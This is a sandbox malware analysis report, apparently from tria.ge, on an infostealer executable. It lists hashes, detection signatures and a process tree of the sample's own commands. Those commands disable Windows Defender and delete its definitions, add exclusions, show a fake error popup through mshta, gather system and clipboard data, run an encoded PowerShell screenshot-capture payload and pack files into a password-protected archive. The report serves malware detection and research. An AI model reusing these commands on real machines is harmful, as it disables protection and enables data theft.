Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    93s
  • max time network
    130s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250129-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250129-enlocale:en-usos:windows10-2004-x64system
  • submitted
    31/01/2025, 20:43

General

  • Target

    lGxCmyo.exe

  • Size

    6.3MB

  • MD5

    8b566fdf77f5acf29c6c5bd2d52eacab

  • SHA1

    19842502be7711f7e4d303c71184dc0b2ac05798

  • SHA256

    4dcab4dff066a113b9f2cea94b1b21837cf92f0874eb3c4fc166824546ff5271

  • SHA512

    d3e12e3a8f5593a8e7eb7c78c0b27e1a2b9ba229a2ab4ff14675589617a43185a9bea8ffa4b26586e9744b39b657d143645f76bcac21f20fbab45509998c1ff6

  • SSDEEP

    98304:ijcIruEVC6IEq9Vyn//5gcllxt3bzBoUv6aQ/BDyZeut1BDjRhh:WDCjTA//5gcllfrNJ6jBGwutlhh

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Drops file in Drivers directory 1 IoCs
  • ACProtect 1.3x - 1.4x DLL software 16 IoCs

    Detects file using ACProtect software.

  • Clipboard Data 1 TTPs 2 IoCs

    Adversaries may collect data stored in the clipboard from users copying information within or between applications.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 17 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Enumerates processes with tasklist 1 TTPs 5 IoCs
  • UPX packed file 61 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Detects videocard installed 1 TTPs 3 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Suspicious behavior: EnumeratesProcesses 19 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\lGxCmyo.exe
    "C:\Users\Admin\AppData\Local\Temp\lGxCmyo.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2152
    • C:\Users\Admin\AppData\Local\Temp\lGxCmyo.exe
      "C:\Users\Admin\AppData\Local\Temp\lGxCmyo.exe"
      2⤵
      • Drops file in Drivers directory
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:4332
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\lGxCmyo.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4780
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\lGxCmyo.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4684
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:3008
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:896
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Invalid download (retry again)', 0, 'Error', 0+16);close()""
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:5008
        • C:\Windows\SysWOW64\mshta.exe
          mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Invalid download (retry again)', 0, 'Error', 0+16);close()"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2952
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4580
        • C:\Windows\SysWOW64\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • System Location Discovery: System Language Discovery
          • Suspicious use of AdjustPrivilegeToken
          PID:540
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2180
        • C:\Windows\SysWOW64\Wbem\WMIC.exe
          wmic csproduct get uuid
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of AdjustPrivilegeToken
          PID:4892
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2084
        • C:\Windows\SysWOW64\reg.exe
          REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
          4⤵
          • System Location Discovery: System Language Discovery
          PID:4156
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1080
        • C:\Windows\SysWOW64\reg.exe
          REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
          4⤵
            PID:3264
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
          3⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:4032
          • C:\Windows\SysWOW64\Wbem\WMIC.exe
            wmic path win32_VideoController get name
            4⤵
            • System Location Discovery: System Language Discovery
            • Detects videocard installed
            • Suspicious use of AdjustPrivilegeToken
            PID:628
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
          3⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:228
          • C:\Windows\SysWOW64\Wbem\WMIC.exe
            wmic path win32_VideoController get name
            4⤵
            • System Location Discovery: System Language Discovery
            • Detects videocard installed
            PID:3504
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\     .scr'"
          3⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:3408
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\     .scr'
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            PID:5096
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
          3⤵
          • System Location Discovery: System Language Discovery
          PID:1284
          • C:\Windows\SysWOW64\tasklist.exe
            tasklist /FO LIST
            4⤵
            • Enumerates processes with tasklist
            • System Location Discovery: System Language Discovery
            PID:1860
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
          3⤵
          • System Location Discovery: System Language Discovery
          PID:620
          • C:\Windows\SysWOW64\tasklist.exe
            tasklist /FO LIST
            4⤵
            • Enumerates processes with tasklist
            • System Location Discovery: System Language Discovery
            PID:1852
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
          3⤵
            PID:3988
            • C:\Windows\SysWOW64\Wbem\WMIC.exe
              WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
              4⤵
              • System Location Discovery: System Language Discovery
              PID:2972
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
            3⤵
            • Clipboard Data
            • System Location Discovery: System Language Discovery
            PID:3004
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell Get-Clipboard
              4⤵
              • Clipboard Data
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:2076
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
            3⤵
            • System Location Discovery: System Language Discovery
            PID:1616
            • C:\Windows\SysWOW64\tasklist.exe
              tasklist /FO LIST
              4⤵
              • Enumerates processes with tasklist
              • System Location Discovery: System Language Discovery
              PID:3720
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c "tree /A /F"
            3⤵
            • System Location Discovery: System Language Discovery
            PID:4000
            • C:\Windows\SysWOW64\tree.com
              tree /A /F
              4⤵
                PID:4456
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c "systeminfo"
              3⤵
              • System Location Discovery: System Language Discovery
              PID:4964
              • C:\Windows\SysWOW64\systeminfo.exe
                systeminfo
                4⤵
                • System Location Discovery: System Language Discovery
                • Gathers system information
                PID:1420
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
              3⤵
              • System Location Discovery: System Language Discovery
              PID:1344
              • C:\Windows\SysWOW64\reg.exe
                REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
                4⤵
                • System Location Discovery: System Language Discovery
                PID:3952
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
              3⤵
              • System Location Discovery: System Language Discovery
              PID:4876
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                4⤵
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                PID:4088
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\e5ygbgce\e5ygbgce.cmdline"
                  5⤵
                  • System Location Discovery: System Language Discovery
                  PID:964
                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                    C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB7D6.tmp" "c:\Users\Admin\AppData\Local\Temp\e5ygbgce\CSC866E9FC6C8794252A890904B786117.TMP"
                    6⤵
                    • System Location Discovery: System Language Discovery
                    PID:1980
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c "tree /A /F"
              3⤵
              • System Location Discovery: System Language Discovery
              PID:1716
              • C:\Windows\SysWOW64\tree.com
                tree /A /F
                4⤵
                • System Location Discovery: System Language Discovery
                PID:3448
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
              3⤵
              • System Location Discovery: System Language Discovery
              PID:1892
              • C:\Windows\SysWOW64\attrib.exe
                attrib -r C:\Windows\System32\drivers\etc\hosts
                4⤵
                • Views/modifies file attributes
                PID:2796
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c "tree /A /F"
              3⤵
              • System Location Discovery: System Language Discovery
              PID:4340
              • C:\Windows\SysWOW64\tree.com
                tree /A /F
                4⤵
                • System Location Discovery: System Language Discovery
                PID:4592
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
              3⤵
              • System Location Discovery: System Language Discovery
              PID:4628
              • C:\Windows\SysWOW64\attrib.exe
                attrib +r C:\Windows\System32\drivers\etc\hosts
                4⤵
                • System Location Discovery: System Language Discovery
                • Views/modifies file attributes
                PID:2848
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c "tree /A /F"
              3⤵
                PID:2984
                • C:\Windows\SysWOW64\tree.com
                  tree /A /F
                  4⤵
                  • System Location Discovery: System Language Discovery
                  PID:980
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                3⤵
                • System Location Discovery: System Language Discovery
                PID:4452
                • C:\Windows\SysWOW64\tasklist.exe
                  tasklist /FO LIST
                  4⤵
                  • Enumerates processes with tasklist
                  PID:1220
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c "tree /A /F"
                3⤵
                • System Location Discovery: System Language Discovery
                PID:5052
                • C:\Windows\SysWOW64\tree.com
                  tree /A /F
                  4⤵
                  • System Location Discovery: System Language Discovery
                  PID:2648
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c "tree /A /F"
                3⤵
                • System Location Discovery: System Language Discovery
                PID:3084
                • C:\Windows\SysWOW64\tree.com
                  tree /A /F
                  4⤵
                  • System Location Discovery: System Language Discovery
                  PID:3116
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c "getmac"
                3⤵
                • System Location Discovery: System Language Discovery
                PID:4336
                • C:\Windows\System32\Conhost.exe
                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  4⤵
                    PID:4592
                  • C:\Windows\SysWOW64\getmac.exe
                    getmac
                    4⤵
                    • System Location Discovery: System Language Discovery
                    PID:1192
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI21522\rar.exe a -r -hp"1234" "C:\Users\Admin\AppData\Local\Temp\ukF45.zip" *"
                  3⤵
                  • System Location Discovery: System Language Discovery
                  PID:2848
                  • C:\Windows\System32\Conhost.exe
                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    4⤵
                      PID:628
                    • C:\Users\Admin\AppData\Local\Temp\_MEI21522\rar.exe
                      C:\Users\Admin\AppData\Local\Temp\_MEI21522\rar.exe a -r -hp"1234" "C:\Users\Admin\AppData\Local\Temp\ukF45.zip" *
                      4⤵
                      • Executes dropped EXE
                      PID:2208
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                    3⤵
